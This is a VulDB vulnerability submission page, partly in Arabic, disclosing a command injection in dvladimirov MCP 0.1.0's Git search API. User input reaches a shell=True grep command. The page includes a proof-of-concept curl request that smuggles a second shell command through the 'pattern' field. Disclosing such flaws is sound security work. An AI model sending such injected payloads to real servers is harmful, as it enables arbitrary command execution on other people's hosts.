إرسال #802083: dvladimirov mcp 0.1.0 Command Injectionالمعلومات

عنوان	dvladimirov mcp 0.1.0 Command Injection
الوصف	The Git search API accepts a caller-controlled pattern string and passes it into a shell command built with Python f-string interpolation. Because the command is executed with shell=True, shell metacharacters in pattern break out of the intended grep invocation and execute arbitrary host commands. curl -s -X POST 'http://HOST:PORT/v1/models/git-analyzer/search' \ -H 'Content-Type: application/json' \ -d '{ "repo_url": "https://github.com/octocat/Hello-World.git", "pattern": "\"; touch /tmp/dvladimirov_mcp_cmdi; #" }'
المصدر	⚠️ https://github.com/dvladimirov/MCP/issues/2
المستخدم	SmallW (UID 97245)
ارسال	10/04/2026 02:57 PM (2 أشهر منذ)
الاعتدال	27/04/2026 05:01 PM (17 days later)
الحالة	تمت الموافقة
إدخال VulDB	359807 [dvladimirov MCP حتى 0.1.0 Git Search API mcp_server.py GitSearchRequest repo_url/pattern تجاوز الصلاحيات]
النقاط	20

Do you want to use VulDB in your project?

Use the official API to access entries easily!